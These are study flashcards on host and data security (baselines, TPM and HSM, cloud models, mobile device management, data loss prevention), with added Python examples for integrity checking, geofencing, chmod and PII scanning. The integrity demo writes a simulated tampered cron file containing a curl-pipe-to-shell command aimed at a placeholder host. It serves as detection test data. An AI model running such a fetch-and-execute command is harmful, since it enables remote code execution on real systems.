Ch5: Securing Hosts and Data Flashcards
Least functionality
A core security principle stating that systems should be deployed with the fewest applications, services, and protocols needed to do their job; anything not needed is attack surface and should be removed or disabled
Trusted OS
A trusted OS meets a set of predetermined security requirements, such as those defined in the Common Criteria, and uses the mandatory access control (MAC) model
A master image provides
a secure starting point for systems
Admins create master images with templates or other tools to…
create a secure baseline
Integrity measurements discover…
when a system deviates from the baseline
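Added example (Python, not code from the original page): an integrity measurement takes a baseline of each file's content hash and permission mode, then a later measurement is compared against it and every deviation is reported. The directory tree, file names and the "drift" applied to it are constructed here for illustration.

```python
import hashlib
import os
import stat
import tempfile


def measure(root):
    """Return {relative_path: (sha256_hex, permission_mode)} for every regular file under root."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue  # skip symlinks, devices, sockets
            h = hashlib.sha256()
            with open(path, "rb") as f:
                for chunk in iter(lambda: f.read(65536), b""):
                    h.update(chunk)
            rel = os.path.relpath(path, root)
            result[rel] = (h.hexdigest(), stat.S_IMODE(st.st_mode))
    return result


def compare(baseline, current):
    """Return a sorted list of (path, deviation) tuples where current differs from baseline."""
    findings = []
    for path in sorted(set(baseline) | set(current)):
        if path not in current:
            findings.append((path, "removed"))
        elif path not in baseline:
            findings.append((path, "added"))
        else:
            b_hash, b_mode = baseline[path]
            c_hash, c_mode = current[path]
            if b_hash != c_hash:
                findings.append((path, "content changed"))
            if b_mode != c_mode:
                findings.append((path, "mode changed %o -> %o" % (b_mode, c_mode)))
    return findings


def demo():
    """Constructed scenario: take a baseline, tamper with the tree, re-measure, diff."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "etc"))
        with open(os.path.join(root, "etc", "sshd_config"), "w") as f:
            f.write("PermitRootLogin no\n")
        with open(os.path.join(root, "etc", "shadow"), "w") as f:
            f.write("root:*:0:0:99999:7:::\n")
        os.chmod(os.path.join(root, "etc", "shadow"), 0o600)
        baseline = measure(root)

        # Simulated drift: config weakened, shadow made world-readable, unexpected script dropped.
        with open(os.path.join(root, "etc", "sshd_config"), "w") as f:
            f.write("PermitRootLogin yes\n")
        os.chmod(os.path.join(root, "etc", "shadow"), 0o644)
        with open(os.path.join(root, "etc", "cron.hourly.sh"), "w") as f:
            f.write("#!/bin/sh\ncurl http://example.invalid | sh\n")
        return compare(baseline, measure(root))


if __name__ == "__main__":
    for path, what in demo():
        print("%-24s %s" % (path, what))
```

Real tools (AIDE, Tripwire, OS-level measured boot) record more attributes (owner, inode, extended attributes, capabilities) and keep the baseline on read-only or remote storage so an attacker who alters a file cannot also alter the record of it.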
The WannaCry ransomware worked only because…
Systems had not been kept up to date with current patches. Microsoft had released a patch for the SMBv1 vulnerability it exploited two months before the attack
Patch management ensures
Operating systems and applications are kept up to date with current patches to protect systems against known vulnerabilities
Change management
Defines the process and accounting structure for handling modifications and upgrades. The goal is to document all changes and reduce the risk of unintended outages
Application whitelist
List of authorized software that prevents users from installing or running software that isn’t on the list
Application blacklist
List of unauthorized software that prevents users from installing or running software on the list
Sandboxing
The use of an isolated area, often used for testing
I can create a sandbox with…
A VM or the chroot command on Linux (chroot alone is not a hardened security boundary; a process running as root can escape it, so it is suited to testing rather than containing hostile code)
Secure deployment environment includes
Development, testing, staging, and production elements
Secure systems design considers…
Electromagnetic interference (EMI) and electromagnetic pulse (EMP)
EMI sources
Motors, power lines, fluorescent lights. Can be prevented with shielding
Mild forms of EMP
Electrostatic discharge and lightning. Systems can be protected from these
TPM
Trusted Platform Module is a hardware chip included in many laptops and mobile devices. It holds a unique asymmetric key (the endorsement key, typically RSA) burned into the chip at manufacture and provides a hardware root of trust
TPM provides
Protected key storage for full disk encryption (the TPM seals the disk key to the measured boot state rather than encrypting the disk itself), support for a secure boot process, and remote attestation
HSM
A hardware security module is a removable or external device that generates, stores, and manages cryptographic keys (RSA keys among others) used in encryption; private keys never leave the device in the clear. Many server-based applications use an HSM to protect keys
SaaS
Software as a Service includes any software or application delivered to users over a network such as the Internet, for example web-based email
PaaS
Platform as a Service provides customers with a fully managed platform that the vendor keeps up to date with current patches; customers deploy their own applications on it
IaaS
Infrastructure as a Service provides customers with access to hardware (compute, storage, networking) in a self-managed platform; the customer is responsible for patching the OS and everything above it
CASB
A cloud access security broker is a software tool deployed between an organization’s network and the cloud provider that provides Security as a Service by monitoring traffic and enforcing security policies
Private clouds
Available to only one organization
Public cloud services
…are provided by 3rd-party companies and available to anyone
Community cloud
Shared by multiple organizations with common requirements
Hybrid cloud
A combination of two or more cloud deployment models, such as a private cloud joined to a public cloud
COPE devices
Corporate-owned, personally enabled devices are owned by the organization but employees can use them for personal reasons
BYOD
A bring your own device policy allows employees to connect their own personal devices to the corporate network
CYOD
A choose your own device policy includes a list of approved devices. Employees with a device on the list can connect to the network
VDI
A virtual desktop infrastructure hosts users' desktops as virtual machines on central servers; the desktops can be built so that users access them from a mobile device, keeping the data off the device itself
MDM tools help…
Mobile device management tools help enforce security policies on mobile devices.
MDM tools include
Storage segmentation, containerization, full disk encryption, and enforcement of strong authentication methods to prevent unauthorized access
Remote wipe
sends a signal to a lost or stolen device to erase all data
Geolocation
Uses GPS and can help locate a lost or stolen device
Geofencing
creates a virtual fence or geographic boundary and can be used to detect when a device is within an organization’s property
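Added example (Python, not code from the original page) of the check behind a geofence rule: given a device's reported GPS fix, decide whether it is inside the organization's property. Two fence shapes are shown, a circle (great-circle distance from a centre point) and a polygon (ray-casting point-in-polygon). The campus coordinates, radius and device IDs are constructed for illustration.

```python
import math

EARTH_RADIUS_M = 6371000.0

# Constructed campus: a rectangle about 1.1 km by 0.85 km near 40.0N, 74.0W,
# plus a circular fence of 600 m around its centre for comparison.
CAMPUS_POLYGON = [(40.000, -74.000), (40.000, -73.990), (40.010, -73.990), (40.010, -74.000)]
CAMPUS_CENTER = (40.005, -73.995)
CAMPUS_RADIUS_M = 600.0


def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres between two WGS84 lat/lon points."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_M * math.asin(math.sqrt(a))


def in_circle_fence(lat, lon, center, radius_m):
    """True when the point is within radius_m of the fence centre."""
    return haversine_m(lat, lon, center[0], center[1]) <= radius_m


def in_polygon_fence(lat, lon, polygon):
    """Ray casting: a horizontal ray from the point crosses the polygon edges an odd
    number of times if and only if the point is inside. Treating lat/lon as planar
    coordinates is accurate enough at campus scale; it is not for continent-sized fences."""
    inside = False
    n = len(polygon)
    for i in range(n):
        lat_i, lon_i = polygon[i]
        lat_j, lon_j = polygon[(i + 1) % n]
        crosses = (lon_i > lon) != (lon_j > lon)  # edge spans the point's longitude
        if crosses:
            # Latitude at which the edge meets the ray; division is safe because
            # lon_j != lon_i whenever crosses is True.
            lat_at_edge = (lat_j - lat_i) * (lon - lon_i) / (lon_j - lon_i) + lat_i
            if lat < lat_at_edge:
                inside = not inside
    return inside


def check_device(device_id, lat, lon):
    """Return (device_id, inside_polygon, inside_circle): the signal an MDM rule acts on,
    e.g. allow the camera only inside, or alert when a managed device leaves the site."""
    return (
        device_id,
        in_polygon_fence(lat, lon, CAMPUS_POLYGON),
        in_circle_fence(lat, lon, CAMPUS_CENTER, CAMPUS_RADIUS_M),
    )


if __name__ == "__main__":
    for dev, lat, lon in [("tablet-17", 40.005, -73.995),
                          ("tablet-17", 40.0095, -73.9905),
                          ("phone-03", 40.020, -73.995)]:
        print(check_device(dev, lat, lon))
```

The corner fix (40.0095, -73.9905) is inside the rectangular fence but about 630 m from its centre, so the circular fence reports it as outside: the polygon matches the property line, the circle is only an approximation. A practical rule also needs a tolerance for GPS error and should not trust a single fix, since reported positions can be spoofed on rooted or jailbroken devices.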
GPS tagging
adds geographical data to files such as pictures
Context-aware authentication
uses multiple elements to authenticate a user and a mobile device
Jailbreaking
removes Apple's software restrictions from an iOS device, allowing apps from outside the App Store and unrestricted access to the OS
Rooting (android)
modifies an Android device to give users root-level access to it. Flashing the device with custom firmware is another way to root an Android device
Sideloading
The process of installing software on an Android device from a source other than an authorized store
Tethering
The process of sharing a mobile device’s Internet connection with other devices
Wi-Fi Direct
A standard that allows devices to connect without a wireless access point or wireless router
You can use what to prevent tethering or Wi-Fi Direct Internet access?
MDM tools can block access to devices using tethering or Wi-Fi Direct to access the Internet
Embedded system
Any device with a dedicated function that uses a computer system to perform that function, including IoT devices such as wearable technology and home automation systems
SCADA system
A supervisory control and data acquisition system uses embedded systems to control an industrial control system (ICS), such as one used in a power plant or water treatment facility
Primary methods of protecting confidentiality of data
encryption and strong access controls
Database column encryption
protects individual fields within a database
File/folder-level protection
protects individual files
Full disk encryption
protects entire disks
chmod
changes file and directory permissions on Linux systems, using either numeric (octal) modes or symbolic ones; for example, chmod 600 file leaves the owner with read and write access and everyone else with none
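Added example (Python, not code from the original page) showing how chmod's two mode syntaxes map to the same permission bits: numeric modes such as 640 are octal triples for owner, group and others, and symbolic modes such as u=rw,g=r,o= modify those bits per class. The parser below handles the common subset (who: u, g, o, a; operator: =, +, -; perms: r, w, x) and applies the result with os.chmod to a constructed file.

```python
import os
import stat
import tempfile

WHO_BITS = {"u": 0o700, "g": 0o070, "o": 0o007, "a": 0o777}
PERM_BITS = {"r": 0o444, "w": 0o222, "x": 0o111}


def _split_clause(clause):
    """Split 'ug+rw' into ('ug', '+', 'rw'). A missing 'who' means all classes here;
    real chmod also applies the umask in that case, which this simplified parser does not."""
    for i, ch in enumerate(clause):
        if ch in "=+-":
            return (clause[:i] or "a"), ch, clause[i + 1:]
    raise ValueError("bad symbolic clause: %r" % clause)


def apply_symbolic(mode, spec):
    """Apply a chmod-style symbolic spec (clauses separated by commas) to an octal mode.
    Special bits (s, t, X) are not supported by this subset."""
    for clause in spec.split(","):
        who, op, perms = _split_clause(clause)
        mask = 0
        for w in who:
            mask |= WHO_BITS[w]
        bits = 0
        for p in perms:
            bits |= PERM_BITS[p] & mask
        if op == "=":
            mode = (mode & ~mask) | bits   # replace the selected classes entirely
        elif op == "+":
            mode |= bits                   # grant
        else:
            mode &= ~bits                  # revoke
    return mode & 0o777


def set_mode(path, spec):
    """chmod path; spec is an octal string like '640' or a symbolic string like 'g+r'.
    Returns the mode actually recorded on the file afterwards."""
    if spec.isdigit():
        new_mode = int(spec, 8)
    else:
        current = stat.S_IMODE(os.stat(path).st_mode)
        new_mode = apply_symbolic(current, spec)
    os.chmod(path, new_mode)
    return stat.S_IMODE(os.stat(path).st_mode)


def demo():
    """Constructed scenario: a secret file left world-writable, then locked down."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "api_token")       # hypothetical secret file
        with open(path, "w") as f:
            f.write("hypothetical-token\n")
        os.chmod(path, 0o666)                       # deliberately too permissive: rw-rw-rw-
        owner_only = set_mode(path, "600")          # numeric form:  rw-------
        group_read = set_mode(path, "g+r")          # symbolic form: rw-r-----
        return owner_only, group_read


if __name__ == "__main__":
    print("%o %o" % demo())
```

The least-functionality idea applies to permissions as well: start from the tightest mode (600 for secrets, 644 or 755 for shared content) and add bits only for a reason, rather than starting from 777 and taking bits away.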
Data exfiltration
the unauthorized transfer of data out of a network
DLP techniques
Data loss prevention techniques can block the use of USB devices to prevent data loss and monitor outgoing email traffic for unauthorized data transfers
Cloud-based DLP
can enforce security policies for data stored in the cloud, such as ensuring that Personally Identifiable Information (PII) is encrypted
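Added example (Python, not code from the original page) of the outbound-email monitoring and the "PII must be protected" policy described in the two cards above: each message body is scanned for US SSNs and payment card numbers (with a Luhn check so that order numbers are not flagged), and the result decides whether the message is released, released only with encryption, or blocked. The messages, domains and policy are constructed assumptions; a production DLP engine uses many more detectors and exact-data matching.

```python
import re

# US SSN in dashed form, excluding impossible area (000, 666, 9xx), group (00) and serial (0000).
SSN_RE = re.compile(r"\b(?!000|666|9\d\d)\d{3}-(?!00)\d{2}-(?!0000)\d{4}\b")
# 13 to 19 digits, optionally separated by single spaces or dashes.
CARD_RE = re.compile(r"\b\d(?:[ -]?\d){12,18}\b")

# Constructed outbound messages: (sender, recipient, body).
OUTBOUND = [
    ("alice@corp.example", "hr@corp.example", "Please update the record for SSN 123-45-6789."),
    ("bob@corp.example", "vendor@partner.invalid", "Card on file: 4111 1111 1111 1111, exp 12/29."),
    ("carol@corp.example", "friend@mail.invalid", "Order 1234-5678-1234-5678 shipped today."),
]


def luhn_ok(digits):
    """Luhn checksum used by payment card numbers; filters most random digit runs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def scan(body):
    """Return a list of (kind, redacted_value) findings for one message body."""
    findings = []
    for m in SSN_RE.finditer(body):
        findings.append(("ssn", "***-**-" + m.group(0)[-4:]))
    for m in CARD_RE.finditer(body):
        digits = re.sub(r"[ -]", "", m.group(0))
        if luhn_ok(digits):
            findings.append(("card", "*" * (len(digits) - 4) + digits[-4:]))
    return findings


def decide(body, recipient_domain, internal_domain="corp.example"):
    """Assumed policy: PII may go to the internal domain only if encrypted; otherwise block."""
    findings = scan(body)
    if not findings:
        return "allow", findings
    if recipient_domain == internal_domain:
        return "allow-encrypted", findings   # release, but force encryption in transit and at rest
    return "block", findings


def run(messages=OUTBOUND):
    """Evaluate every message; returns [(recipient, verdict, findings)]."""
    out = []
    for _sender, recipient, body in messages:
        verdict, findings = decide(body, recipient.split("@", 1)[1])
        out.append((recipient, verdict, findings))
    return out


if __name__ == "__main__":
    for recipient, verdict, findings in run():
        print("%-24s %-16s %s" % (recipient, verdict, findings))
```

Findings are redacted before they are returned so that the DLP log itself does not become a second copy of the PII, a common mistake in home-grown scanners.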